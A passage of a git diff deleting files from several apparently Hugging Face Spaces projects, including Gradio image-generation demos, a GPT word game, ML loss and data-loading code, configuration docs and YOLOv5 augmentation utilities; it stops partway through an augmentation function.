a/spaces/akhaliq/lama/bin/paper_runfiles/generate_val_test.sh b/spaces/akhaliq/lama/bin/paper_runfiles/generate_val_test.sh deleted file mode 100644 index d9b2a370ceeeb8f401706f4303298db13e5fad91..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/lama/bin/paper_runfiles/generate_val_test.sh +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env bash - -# !!! 
file set to make test_large_30k from the vanilla test_large: configs/test_large_30k.lst - -# paths to data are valid for mml7 -PLACES_ROOT="/data/inpainting/Places365" -OUT_DIR="/data/inpainting/paper_data/Places365_val_test" - -source "$(dirname $0)/env.sh" - -for datadir in test_large_30k # val_large -do - for conf in random_thin_256 random_medium_256 random_thick_256 random_thin_512 random_medium_512 random_thick_512 - do - "$BINDIR/gen_mask_dataset.py" "$CONFIGDIR/data_gen/${conf}.yaml" \ - "$PLACES_ROOT/$datadir" "$OUT_DIR/$datadir/$conf" --n-jobs 8 - - "$BINDIR/calc_dataset_stats.py" --samples-n 20 "$OUT_DIR/$datadir/$conf" "$OUT_DIR/$datadir/${conf}_stats" - done - - for conf in segm_256 segm_512 - do - "$BINDIR/gen_mask_dataset.py" "$CONFIGDIR/data_gen/${conf}.yaml" \ - "$PLACES_ROOT/$datadir" "$OUT_DIR/$datadir/$conf" --n-jobs 2 - - "$BINDIR/calc_dataset_stats.py" --samples-n 20 "$OUT_DIR/$datadir/$conf" "$OUT_DIR/$datadir/${conf}_stats" - done -done diff --git a/spaces/akhaliq/openjourney/app.py b/spaces/akhaliq/openjourney/app.py deleted file mode 100644 index 33db95967a9e7d26bae17e6d175bc370aa9680d8..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/openjourney/app.py +++ /dev/null @@ -1,276 +0,0 @@ -from diffusers import AutoencoderKL, UNet2DConditionModel, StableDiffusionPipeline, StableDiffusionImg2ImgPipeline, DPMSolverMultistepScheduler -import gradio as gr -import torch -from PIL import Image -import utils -import datetime -import time -import psutil - -start_time = time.time() -is_colab = utils.is_google_colab() - -class Model: - def __init__(self, name, path="", prefix=""): - self.name = name - self.path = path - self.prefix = prefix - self.pipe_t2i = None - self.pipe_i2i = None - -models = [ - Model("openjourney", "prompthero/openjourney", "openjourney style"), - ] - # Model("Spider-Verse", "nitrosocke/spider-verse-diffusion", "spiderverse style "), - # Model("Balloon Art", "Fictiverse/Stable_Diffusion_BalloonArt_Model", "BalloonArt "), - # Model("Elden Ring", "nitrosocke/elden-ring-diffusion", "elden ring style "), - # Model("Tron Legacy", "dallinmackay/Tron-Legacy-diffusion", "trnlgcy ") - #Model("Pokémon", "lambdalabs/sd-pokemon-diffusers", ""), - #Model("Pony Diffusion", "AstraliteHeart/pony-diffusion", ""), - #Model("Robo Diffusion", "nousr/robo-diffusion", ""), - -scheduler = DPMSolverMultistepScheduler( - beta_start=0.00085, - beta_end=0.012, - beta_schedule="scaled_linear", - num_train_timesteps=1000, - trained_betas=None, - predict_epsilon=True, - thresholding=False, - algorithm_type="dpmsolver++", - solver_type="midpoint", - lower_order_final=True, -) - -custom_model = None -if is_colab: - models.insert(0, Model("Custom model")) - custom_model = models[0] - -last_mode = "txt2img" -current_model = models[1] if is_colab else models[0] -current_model_path = current_model.path - -if is_colab: - pipe = StableDiffusionPipeline.from_pretrained(current_model.path, torch_dtype=torch.float16, scheduler=scheduler, safety_checker=lambda images, clip_input: (images, False)) - -else: # download all models - print(f"{datetime.datetime.now()} Downloading vae...") - vae = AutoencoderKL.from_pretrained(current_model.path, subfolder="vae", torch_dtype=torch.float16) - for model in models: - try: - print(f"{datetime.datetime.now()} Downloading {model.name} model...") - unet = UNet2DConditionModel.from_pretrained(model.path, subfolder="unet", torch_dtype=torch.float16) - model.pipe_t2i = StableDiffusionPipeline.from_pretrained(model.path, unet=unet, vae=vae, 
torch_dtype=torch.float16, scheduler=scheduler) - model.pipe_i2i = StableDiffusionImg2ImgPipeline.from_pretrained(model.path, unet=unet, vae=vae, torch_dtype=torch.float16, scheduler=scheduler) - except Exception as e: - print(f"{datetime.datetime.now()} Failed to load model " + model.name + ": " + str(e)) - models.remove(model) - pipe = models[0].pipe_t2i - -if torch.cuda.is_available(): - pipe = pipe.to("cuda") - -device = "GPU 🔥" if torch.cuda.is_available() else "CPU 🥶" - -def error_str(error, title="Error"): - return f"""#### {title} - {error}""" if error else "" - -def custom_model_changed(path): - models[0].path = path - global current_model - current_model = models[0] - -def on_model_change(model_name): - - prefix = "Enter prompt. \"" + next((m.prefix for m in models if m.name == model_name), None) + "\" is prefixed automatically" if model_name != models[0].name else "Don't forget to use the custom model prefix in the prompt!" - - return gr.update(visible = model_name == models[0].name), gr.update(placeholder=prefix) - -def inference(model_name, prompt, guidance, steps, width=512, height=512, seed=0, img=None, strength=0.5, neg_prompt=""): - - print(psutil.virtual_memory()) # print memory usage - - global current_model - for model in models: - if model.name == model_name: - current_model = model - model_path = current_model.path - - generator = torch.Generator('cuda').manual_seed(seed) if seed != 0 else None - - try: - if img is not None: - return img_to_img(model_path, prompt, neg_prompt, img, strength, guidance, steps, width, height, generator), None - else: - return txt_to_img(model_path, prompt, neg_prompt, guidance, steps, width, height, generator), None - except Exception as e: - return None, error_str(e) - -def txt_to_img(model_path, prompt, neg_prompt, guidance, steps, width, height, generator): - - print(f"{datetime.datetime.now()} txt_to_img, model: {current_model.name}") - - global last_mode - global pipe - global current_model_path - if model_path != current_model_path or last_mode != "txt2img": - current_model_path = model_path - - if is_colab or current_model == custom_model: - pipe = StableDiffusionPipeline.from_pretrained(current_model_path, torch_dtype=torch.float16, scheduler=scheduler, safety_checker=lambda images, clip_input: (images, False)) - else: - pipe = pipe.to("cpu") - pipe = current_model.pipe_t2i - - if torch.cuda.is_available(): - pipe = pipe.to("cuda") - last_mode = "txt2img" - - prompt = current_model.prefix + prompt - result = pipe( - prompt, - negative_prompt = neg_prompt, - # num_images_per_prompt=n_images, - num_inference_steps = int(steps), - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return replace_nsfw_images(result) - -def img_to_img(model_path, prompt, neg_prompt, img, strength, guidance, steps, width, height, generator): - - print(f"{datetime.datetime.now()} img_to_img, model: {model_path}") - - global last_mode - global pipe - global current_model_path - if model_path != current_model_path or last_mode != "img2img": - current_model_path = model_path - - if is_colab or current_model == custom_model: - pipe = StableDiffusionImg2ImgPipeline.from_pretrained(current_model_path, torch_dtype=torch.float16, scheduler=scheduler, safety_checker=lambda images, clip_input: (images, False)) - else: - pipe = pipe.to("cpu") - pipe = current_model.pipe_i2i - - if torch.cuda.is_available(): - pipe = pipe.to("cuda") - last_mode = "img2img" - - prompt = current_model.prefix + prompt - ratio = min(height / 
img.height, width / img.width) - img = img.resize((int(img.width * ratio), int(img.height * ratio)), Image.LANCZOS) - result = pipe( - prompt, - negative_prompt = neg_prompt, - # num_images_per_prompt=n_images, - init_image = img, - num_inference_steps = int(steps), - strength = strength, - guidance_scale = guidance, - width = width, - height = height, - generator = generator) - - return replace_nsfw_images(result) - -def replace_nsfw_images(results): - - if is_colab: - return results.images[0] - - for i in range(len(results.images)): - if results.nsfw_content_detected[i]: - results.images[i] = Image.open("nsfw.png") - return results.images[0] - -css = """.finetuned-diffusion-div div{display:inline-flex;align-items:center;gap:.8rem;font-size:1.75rem}.finetuned-diffusion-div div h1{font-weight:900;margin-bottom:7px}.finetuned-diffusion-div p{margin-bottom:10px;font-size:94%}a{text-decoration:underline}.tabs{margin-top:0;margin-bottom:0}#gallery{min-height:20rem} -""" -with gr.Blocks(css=css) as demo: - gr.HTML( - f""" -
      -
      -

      Openjourney

      -
      -

      - Demo for openjourney -

      -

      This demo is currently on cpu, to use it upgrade to gpu by going to settings after duplicating this space: Duplicate Space

      -

      -
      - """ - ) - with gr.Row(): - - with gr.Column(scale=55): - with gr.Group(): - model_name = gr.Dropdown(label="Model", choices=[m.name for m in models], value=current_model.name) - with gr.Box(visible=False) as custom_model_group: - custom_model_path = gr.Textbox(label="Custom model path", placeholder="Path to model, e.g. nitrosocke/Arcane-Diffusion", interactive=True) - gr.HTML("
      Custom models have to be downloaded first, so give it some time.
      ") - - with gr.Row(): - prompt = gr.Textbox(label="Prompt", show_label=False, max_lines=2,placeholder="Enter prompt. Style applied automatically").style(container=False) - generate = gr.Button(value="Generate").style(rounded=(False, True, True, False)) - - - image_out = gr.Image(height=512) - # gallery = gr.Gallery( - # label="Generated images", show_label=False, elem_id="gallery" - # ).style(grid=[1], height="auto") - error_output = gr.Markdown() - - with gr.Column(scale=45): - with gr.Tab("Options"): - with gr.Group(): - neg_prompt = gr.Textbox(label="Negative prompt", placeholder="What to exclude from the image") - - # n_images = gr.Slider(label="Images", value=1, minimum=1, maximum=4, step=1) - - with gr.Row(): - guidance = gr.Slider(label="Guidance scale", value=7.5, maximum=15) - steps = gr.Slider(label="Steps", value=25, minimum=2, maximum=75, step=1) - - with gr.Row(): - width = gr.Slider(label="Width", value=512, minimum=64, maximum=1024, step=8) - height = gr.Slider(label="Height", value=512, minimum=64, maximum=1024, step=8) - - seed = gr.Slider(0, 2147483647, label='Seed (0 = random)', value=0, step=1) - - with gr.Tab("Image to image"): - with gr.Group(): - image = gr.Image(label="Image", height=256, tool="editor", type="pil") - strength = gr.Slider(label="Transformation strength", minimum=0, maximum=1, step=0.01, value=0.5) - - if is_colab: - model_name.change(on_model_change, inputs=model_name, outputs=[custom_model_group, prompt], queue=False) - custom_model_path.change(custom_model_changed, inputs=custom_model_path, outputs=None) - # n_images.change(lambda n: gr.Gallery().style(grid=[2 if n > 1 else 1], height="auto"), inputs=n_images, outputs=gallery) - - inputs = [model_name, prompt, guidance, steps, width, height, seed, image, strength, neg_prompt] - outputs = [image_out, error_output] - prompt.submit(inference, inputs=inputs, outputs=outputs) - generate.click(inference, inputs=inputs, outputs=outputs) - - ex = gr.Examples([ - [models[0].name, "iron man", 7.5, 50], - - ], inputs=[model_name, prompt, guidance, steps, seed], outputs=outputs, fn=inference, cache_examples=False) - - gr.HTML(""" -
      -
      -

      Model by prompthero

      -
      - """) - -print(f"Space built in {time.time() - start_time:.2f} seconds") - -if not is_colab: - demo.queue(concurrency_count=1) -demo.launch(debug=is_colab, share=is_colab) \ No newline at end of file diff --git a/spaces/akuysal/SMS-spam-English-sklearn/README.md b/spaces/akuysal/SMS-spam-English-sklearn/README.md deleted file mode 100644 index 33b55b55013528a07d7ad4c86807d93573f1aba4..0000000000000000000000000000000000000000 --- a/spaces/akuysal/SMS-spam-English-sklearn/README.md +++ /dev/null @@ -1,21 +0,0 @@ ---- -title: SMS Spam English Scikit-Learn -emoji: 🌖 -colorFrom: gray -colorTo: green -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false -license: openrail ---- - -ENGLISH -The dataset used in the study "T.A. Almeida, J.M.G. Hidalgo, and A. Yamakami, Contributions to the Study of SMS Spam Filtering: New Collection and Results, Proc. 11th ACM Symposium on Document Engineering, pp. 259-262, 2011." is employed for training. The success ratio for Linear SVM Classifier is 0.9742 in terms of Macro-F1 when 10% of the dataset was used for testing. -The dataset is composed of SPAM and LEGITIMATE sms data. - -TÜRKÇE -Bu çalışmada "T.A. Almeida, J.M.G. Hidalgo, and A. Yamakami, Contributions to the Study of SMS Spam Filtering: New Collection and Results, Proc. 11th ACM Symposium on Document Engineering, pp. 259-262, 2011." başlıklı çalışmadaki veri seti kullanılmıştır. Linear SVM sınıflandırıcı için başarı oranı, veri setinin %10'u test için kullanıldığında Makro-F1 açısından 0.9742'dir. -Veri seti, SPAM ve LEGITIMATE kısa mesaj verilerinden oluşmaktadır. - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/alamin655/websurfx/docs/configuration.md b/spaces/alamin655/websurfx/docs/configuration.md deleted file mode 100644 index 665d939cef39e3c45d6cb68908651dc67b618044..0000000000000000000000000000000000000000 --- a/spaces/alamin655/websurfx/docs/configuration.md +++ /dev/null @@ -1,68 +0,0 @@ -# Configuration - -## Installed From Source - -If you have built `websurfx` from source then the configuration file will be located under project directory (codebase) at `websurfx/` - -> **Note** -> If you have built websurfx with unstable/rolling/edge branch then you can copy the configuration file from `websurfx/config.lua` located under project directory (codebase) to `~/.config/websurfx/` and make the changes there and rerun the websurfx server. _This is only available from unstable/rolling/edge version_. - -## Installed From Package - -If you have installed `websurfx` using the package manager of your Linux distro then the default configuration file will be located at `/etc/xdg/websurfx/`. You can copy the default config to `~/.config/websurfx/` and make the changes there and rerun the websurfx server. - -Some of the configuration options provided in the file are stated below. These are subdivided into the following categories: - -- General -- Server -- Website -- Cache -- Search Engines - -# General - -- **logging:** An option to enable or disable logs. -- **debug:** An option to enable or disable debug mode. -- **threads:** The amount of threads that the app will use to run (the value should be greater than 0). - -## Server - -- **port:** Port number on which server should be launched. -- **binding_ip_addr:** IP address on the which server should be launched. 
-- **production_use:** Whether to use production mode or not (in other words this option should be used if it is to be used to host it on the server to provide a service to a large number of users). If production_use is set to true. There will be a random delay before sending the request to the search engines, this is to prevent DDoSing the upstream search engines from a large number of simultaneous requests. This is newly added option and hence is only available in the **edge version**. -- **request_timeout:** Timeout for the search requests sent to the upstream search engines to be fetched (value in seconds). - -## Website - -- **colorscheme:** The colorscheme name which should be used for the website theme (the name should be in accordance to the colorscheme file name present in `public/static/colorschemes` folder). - -> By Default we provide 12 colorschemes to choose from these are: -> -> 1. catppuccin-mocha -> 2. dark-chocolate -> 3. dracula -> 4. gruvbox-dark -> 5. monokai -> 6. nord -> 7. oceanic-next -> 8. one-dark -> 9. solarized-dark -> 10. solarized-light -> 11. tokyo-night -> 12. tomorrow-night - -- **theme:** The theme name which should be used for the website (again, the name should be in accordance to the theme file name present in `public/static/themes` folder). - -> By Default we provide 1 theme to choose from these are: -> -> 1. simple - -## Cache - -- **redis_url:** Redis connection url address on which the client should connect on. - -## Search Engines - -- **upstream_search_engines:** Select from the different upstream search engines from which the results should be fetched. - -[⬅️ Go back to Home](./README.md) diff --git a/spaces/aliabid94/GPT-Golf/run.py b/spaces/aliabid94/GPT-Golf/run.py deleted file mode 100644 index 74c14871d68aa867516d5fc8c49aa8a19deebe4c..0000000000000000000000000000000000000000 --- a/spaces/aliabid94/GPT-Golf/run.py +++ /dev/null @@ -1,115 +0,0 @@ -import gradio as gr -import json -import random -# from transformers import pipeline - -# generator = pipeline("text-generation", model="gpt2", max_length=60) - -with open("wordlist.json") as wordlist_json: - wordlist = json.load(wordlist_json) - - -def autocomplete(text): - return "more words" - # end_text = " ".join(text.split(" ")[-30:-1]) - # generated_text = generator( - # end_text, return_full_text=False, clean_up_tokenization_spaces=True - # )[0]["generated_text"] - # generated_text = generated_text.replace("\n", "") - # return generated_text - - -with gr.Blocks() as demo: - gr.Markdown( - """ - # GPT Golf - - How many turns will it take you to get GPT to say the target word? - Here are the rules of the game: - - Your goal is to get GPT to say a target word in as few turns as possible. - - Each turn, you add up to 5 words to its dialogue. - - When you click submit, your prompt will be added to the dialogue. Then GPT will also add to the dialogue. - - You can't say the target word, but as soon as GPT does, you win! 
- """ - ) - error_box = gr.Textbox(label="Error", elem_id="error", visible=False) - dialogue_var = gr.Variable(value=[]) - - start_btn = gr.Button("Start", variant="primary") - with gr.Column(visible=False) as game: - with gr.Row() as stats: - target_word_box = gr.Textbox( - label="Target Word", elem_id="target", interactive=False - ) - num_turns_box = gr.Number(0, label="# of Turns so Far", elem_id="num_turns") - dialogue_box = gr.HighlightedText(label="Dialogue") - with gr.Column() as prompt_set: - prompt_box = gr.Textbox(label="Prompt", placeholder="Enter Next 5 Words...") - submit_btn = gr.Button("Submit").style(full_width=True) - win = gr.HTML( - "
      You Won!
      ", - visible=False, - ) - - def start_game(): - return { - start_btn: gr.update(visible=False), - game: gr.update(visible=True), - target_word_box: random.choice(wordlist), - } - - start_btn.click(start_game, inputs=None, outputs=[start_btn, game, target_word_box]) - - def submit(prompt, target_word, dialogue, num_turns): - if len(prompt.split(" ")) > 5: - return { - error_box: gr.update( - visible=True, value="Prompt must be a maximum of 5 words!" - ) - } - if target_word in prompt: - return { - error_box: gr.update( - visible=True, value="You can't use the target word in the prompt!" - ) - } - dialogue.append(prompt) - response = autocomplete(" ".join(dialogue)) - dialogue.append(response) - labeled_dialogue = [ - (text, None if i % 2 == 0 else "gpt") for i, text in enumerate(dialogue) - ] - if target_word in response: - return { - dialogue_box: labeled_dialogue, - prompt_set: gr.update(visible=False), - win: gr.update(visible=True), - num_turns_box: num_turns + 1, - dialogue_var: dialogue, - error_box: gr.update(visible=False), - } - else: - return { - dialogue_box: labeled_dialogue, - prompt_box: "", - num_turns_box: num_turns + 1, - dialogue_var: dialogue, - error_box: gr.update(visible=False), - } - - submit_btn.click( - submit, - inputs=[prompt_box, target_word_box, dialogue_var, num_turns_box], - outputs=[ - dialogue_var, - dialogue_box, - prompt_box, - num_turns_box, - error_box, - prompt_set, - win, - ], - ) - - -demo.launch() diff --git a/spaces/allknowingroger/Image-Models-Test113/app.py b/spaces/allknowingroger/Image-Models-Test113/app.py deleted file mode 100644 index 2c6f2c273c69698050688c8008594f028e74031a..0000000000000000000000000000000000000000 --- a/spaces/allknowingroger/Image-Models-Test113/app.py +++ /dev/null @@ -1,144 +0,0 @@ -import gradio as gr -# import os -# import sys -# from pathlib import Path -import time - -models =[ - "CiroN2022/cyber-aesthetic", - "CiroN2022/cyber-graphic", - "Yntec/dreamlike-photoreal-remix", - "sourceoftruthdata/sot_autotrain_dreambooth_v1", - "milaidy/lance", - "Akibub/jennysmith3", - "ahmedghani/waqasramzan-2500-sdxl", - "suraj143/my-friend", - "CiroN2022/xenomorph-book", -] - - -model_functions = {} -model_idx = 1 -for model_path in models: - try: - model_functions[model_idx] = gr.Interface.load(f"models/{model_path}", live=False, preprocess=True, postprocess=False) - except Exception as error: - def the_fn(txt): - return None - model_functions[model_idx] = gr.Interface(fn=the_fn, inputs=["text"], outputs=["image"]) - model_idx+=1 - - -def send_it_idx(idx): - def send_it_fn(prompt): - output = (model_functions.get(str(idx)) or model_functions.get(str(1)))(prompt) - return output - return send_it_fn - -def get_prompts(prompt_text): - return prompt_text - -def clear_it(val): - if int(val) != 0: - val = 0 - else: - val = 0 - pass - return val - -def all_task_end(cnt,t_stamp): - to = t_stamp + 60 - et = time.time() - if et > to and t_stamp != 0: - d = gr.update(value=0) - tog = gr.update(value=1) - #print(f'to: {to} et: {et}') - else: - if cnt != 0: - d = gr.update(value=et) - else: - d = gr.update(value=0) - tog = gr.update(value=0) - #print (f'passing: to: {to} et: {et}') - pass - return d, tog - -def all_task_start(): - print("\n\n\n\n\n\n\n") - t = time.gmtime() - t_stamp = time.time() - current_time = time.strftime("%H:%M:%S", t) - return gr.update(value=t_stamp), gr.update(value=t_stamp), gr.update(value=0) - -def clear_fn(): - nn = len(models) - return tuple([None, *[None for _ in range(nn)]]) - - - -with 
gr.Blocks(title="SD Models") as my_interface: - with gr.Column(scale=12): - # with gr.Row(): - # gr.Markdown("""- Primary prompt: 你想画的内容(英文单词,如 a cat, 加英文逗号效果更好;点 Improve 按钮进行完善)\n- Real prompt: 完善后的提示词,出现后再点右边的 Run 按钮开始运行""") - with gr.Row(): - with gr.Row(scale=6): - primary_prompt=gr.Textbox(label="Prompt", value="") - # real_prompt=gr.Textbox(label="Real prompt") - with gr.Row(scale=6): - # improve_prompts_btn=gr.Button("Improve") - with gr.Row(): - run=gr.Button("Run",variant="primary") - clear_btn=gr.Button("Clear") - with gr.Row(): - sd_outputs = {} - model_idx = 1 - for model_path in models: - with gr.Column(scale=3, min_width=320): - with gr.Box(): - sd_outputs[model_idx] = gr.Image(label=model_path) - pass - model_idx += 1 - pass - pass - - with gr.Row(visible=False): - start_box=gr.Number(interactive=False) - end_box=gr.Number(interactive=False) - tog_box=gr.Textbox(value=0,interactive=False) - - start_box.change( - all_task_end, - [start_box, end_box], - [start_box, tog_box], - every=1, - show_progress=False) - - primary_prompt.submit(all_task_start, None, [start_box, end_box, tog_box]) - run.click(all_task_start, None, [start_box, end_box, tog_box]) - runs_dict = {} - model_idx = 1 - for model_path in models: - runs_dict[model_idx] = run.click(model_functions[model_idx], inputs=[primary_prompt], outputs=[sd_outputs[model_idx]]) - model_idx += 1 - pass - pass - - # improve_prompts_btn_clicked=improve_prompts_btn.click( - # get_prompts, - # inputs=[primary_prompt], - # outputs=[primary_prompt], - # cancels=list(runs_dict.values())) - clear_btn.click( - clear_fn, - None, - [primary_prompt, *list(sd_outputs.values())], - cancels=[*list(runs_dict.values())]) - tog_box.change( - clear_it, - tog_box, - tog_box, - cancels=[*list(runs_dict.values())]) - -my_interface.queue(concurrency_count=600, status_update_rate=1) -my_interface.launch(inline=True, show_api=False) - \ No newline at end of file diff --git a/spaces/alvanlii/FROMAGe/fromage/losses.py b/spaces/alvanlii/FROMAGe/fromage/losses.py deleted file mode 100644 index 391aca6b29a95c3047a016e84e2684537580b022..0000000000000000000000000000000000000000 --- a/spaces/alvanlii/FROMAGe/fromage/losses.py +++ /dev/null @@ -1,44 +0,0 @@ -from typing import Optional -import torch -from fromage import utils - -def contrastive_loss(logits: torch.Tensor) -> torch.Tensor: - return torch.nn.functional.cross_entropy(logits, torch.arange(len(logits), device=logits.device)) - - -def contrastive_acc(logits: torch.Tensor, target: Optional[torch.Tensor] = None, topk=(1,)) -> torch.Tensor: - """ - Args: - logits: (N, N) predictions. - target: (N, num_correct_answers) labels. - """ - assert len(logits.shape) == 2, logits.shape - batch_size = logits.shape[0] - - if target is None: - target = torch.arange(len(logits), device=logits.device) - return utils.accuracy(logits, target, -1, topk) - else: - assert len(target.shape) == 2, target.shape - with torch.no_grad(): - maxk = max(topk) - if logits.shape[-1] < maxk: - print(f"[WARNING] Less than {maxk} predictions available. Using {logits.shape[-1]} for topk.") - maxk = min(maxk, logits.shape[-1]) - - # Take topk along the last dimension. 
- _, pred = logits.topk(maxk, -1, True, True) # (N, topk) - assert pred.shape == (batch_size, maxk) - - target_expand = target[:, :, None].repeat(1, 1, maxk) # (N, num_correct_answers, topk) - pred_expand = pred[:, None, :].repeat(1, target.shape[1], 1) # (N, num_correct_answers, topk) - correct = pred_expand.eq(target_expand) # (N, num_correct_answers, topk) - correct = torch.any(correct, dim=1) # (N, topk) - - res = [] - for k in topk: - any_k_correct = torch.clamp(correct[:, :k].sum(1), max=1) # (N,) - correct_k = any_k_correct.float().sum(0, keepdim=True) - res.append(correct_k.mul_(100.0 / batch_size)) - return res - diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/qa/loopback/src/biquad_filter.h b/spaces/amarchheda/ChordDuplicate/portaudio/qa/loopback/src/biquad_filter.h deleted file mode 100644 index 0895abae73ea24b7deac81b48338a17c5c94cb1a..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/qa/loopback/src/biquad_filter.h +++ /dev/null @@ -1,38 +0,0 @@ -#ifndef _BIQUADFILTER_H -#define _BIQUADFILTER_H - - -/** - * Unit_BiquadFilter implements a second order IIR filter. - * - * @author (C) 2002 Phil Burk, SoftSynth.com, All Rights Reserved - */ - -#define BIQUAD_MIN_RATIO (0.000001) -#define BIQUAD_MIN_Q (0.00001) - -typedef struct BiquadFilter_s -{ - double xn1; // storage for delayed signals - double xn2; - double yn1; - double yn2; - - double a0; // coefficients - double a1; - double a2; - - double b1; - double b2; - - double cos_omega; - double sin_omega; - double alpha; -} BiquadFilter; - -void BiquadFilter_SetupHighPass( BiquadFilter *filter, double ratio, double Q ); -void BiquadFilter_SetupNotch( BiquadFilter *filter, double ratio, double Q ); - -void BiquadFilter_Filter( BiquadFilter *filter, float *inputs, float *outputs, int numSamples ); - -#endif diff --git a/spaces/amirDev/crowd-counting-p2p/crowd_datasets/SHHA/loading_data.py b/spaces/amirDev/crowd-counting-p2p/crowd_datasets/SHHA/loading_data.py deleted file mode 100644 index ad921133886d39ce36bc66599c87f03ed5b0781e..0000000000000000000000000000000000000000 --- a/spaces/amirDev/crowd-counting-p2p/crowd_datasets/SHHA/loading_data.py +++ /dev/null @@ -1,27 +0,0 @@ -import torchvision.transforms as standard_transforms -from .SHHA import SHHA - -# DeNormalize used to get original images -class DeNormalize(object): - def __init__(self, mean, std): - self.mean = mean - self.std = std - - def __call__(self, tensor): - for t, m, s in zip(tensor, self.mean, self.std): - t.mul_(s).add_(m) - return tensor - -def loading_data(data_root): - # the pre-proccssing transform - transform = standard_transforms.Compose([ - standard_transforms.ToTensor(), - standard_transforms.Normalize(mean=[0.485, 0.456, 0.406], - std=[0.229, 0.224, 0.225]), - ]) - # create the training dataset - train_set = SHHA(data_root, train=True, transform=transform, patch=True, flip=True) - # create the validation dataset - val_set = SHHA(data_root, train=False, transform=transform) - - return train_set, val_set diff --git a/spaces/anaclaudia13ct/insect_detection/utils/augmentations.py b/spaces/anaclaudia13ct/insect_detection/utils/augmentations.py deleted file mode 100644 index 1eae5db8f816b69cb768acc0677194fa7a215678..0000000000000000000000000000000000000000 --- a/spaces/anaclaudia13ct/insect_detection/utils/augmentations.py +++ /dev/null @@ -1,397 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Image augmentation functions -""" - -import math -import random - -import cv2 -import numpy as np -import torch 
-import torchvision.transforms as T -import torchvision.transforms.functional as TF - -from utils.general import LOGGER, check_version, colorstr, resample_segments, segment2box, xywhn2xyxy -from utils.metrics import bbox_ioa - -IMAGENET_MEAN = 0.485, 0.456, 0.406 # RGB mean -IMAGENET_STD = 0.229, 0.224, 0.225 # RGB standard deviation - - -class Albumentations: - # YOLOv5 Albumentations class (optional, only used if package is installed) - def __init__(self, size=640): - self.transform = None - prefix = colorstr('albumentations: ') - try: - import albumentations as A - check_version(A.__version__, '1.0.3', hard=True) # version requirement - - T = [ - A.RandomResizedCrop(height=size, width=size, scale=(0.8, 1.0), ratio=(0.9, 1.11), p=0.0), - A.Blur(p=0.01), - A.MedianBlur(p=0.01), - A.ToGray(p=0.01), - A.CLAHE(p=0.01), - A.RandomBrightnessContrast(p=0.0), - A.RandomGamma(p=0.0), - A.ImageCompression(quality_lower=75, p=0.0)] # transforms - self.transform = A.Compose(T, bbox_params=A.BboxParams(format='yolo', label_fields=['class_labels'])) - - LOGGER.info(prefix + ', '.join(f'{x}'.replace('always_apply=False, ', '') for x in T if x.p)) - except ImportError: # package not installed, skip - pass - except Exception as e: - LOGGER.info(f'{prefix}{e}') - - def __call__(self, im, labels, p=1.0): - if self.transform and random.random() < p: - new = self.transform(image=im, bboxes=labels[:, 1:], class_labels=labels[:, 0]) # transformed - im, labels = new['image'], np.array([[c, *b] for c, b in zip(new['class_labels'], new['bboxes'])]) - return im, labels - - -def normalize(x, mean=IMAGENET_MEAN, std=IMAGENET_STD, inplace=False): - # Denormalize RGB images x per ImageNet stats in BCHW format, i.e. = (x - mean) / std - return TF.normalize(x, mean, std, inplace=inplace) - - -def denormalize(x, mean=IMAGENET_MEAN, std=IMAGENET_STD): - # Denormalize RGB images x per ImageNet stats in BCHW format, i.e. 
= x * std + mean - for i in range(3): - x[:, i] = x[:, i] * std[i] + mean[i] - return x - - -def augment_hsv(im, hgain=0.5, sgain=0.5, vgain=0.5): - # HSV color-space augmentation - if hgain or sgain or vgain: - r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains - hue, sat, val = cv2.split(cv2.cvtColor(im, cv2.COLOR_BGR2HSV)) - dtype = im.dtype # uint8 - - x = np.arange(0, 256, dtype=r.dtype) - lut_hue = ((x * r[0]) % 180).astype(dtype) - lut_sat = np.clip(x * r[1], 0, 255).astype(dtype) - lut_val = np.clip(x * r[2], 0, 255).astype(dtype) - - im_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))) - cv2.cvtColor(im_hsv, cv2.COLOR_HSV2BGR, dst=im) # no return needed - - -def hist_equalize(im, clahe=True, bgr=False): - # Equalize histogram on BGR image 'im' with im.shape(n,m,3) and range 0-255 - yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV) - if clahe: - c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8)) - yuv[:, :, 0] = c.apply(yuv[:, :, 0]) - else: - yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram - return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB - - -def replicate(im, labels): - # Replicate labels - h, w = im.shape[:2] - boxes = labels[:, 1:].astype(int) - x1, y1, x2, y2 = boxes.T - s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels) - for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices - x1b, y1b, x2b, y2b = boxes[i] - bh, bw = y2b - y1b, x2b - x1b - yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y - x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh] - im[y1a:y2a, x1a:x2a] = im[y1b:y2b, x1b:x2b] # im4[ymin:ymax, xmin:xmax] - labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0) - - return im, labels - - -def letterbox(im, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32): - # Resize and pad image while meeting stride-multiple constraints - shape = im.shape[:2] # current shape [height, width] - if isinstance(new_shape, int): - new_shape = (new_shape, new_shape) - - # Scale ratio (new / old) - r = min(new_shape[0] / shape[0], new_shape[1] / shape[1]) - if not scaleup: # only scale down, do not scale up (for better val mAP) - r = min(r, 1.0) - - # Compute padding - ratio = r, r # width, height ratios - new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r)) - dw, dh = 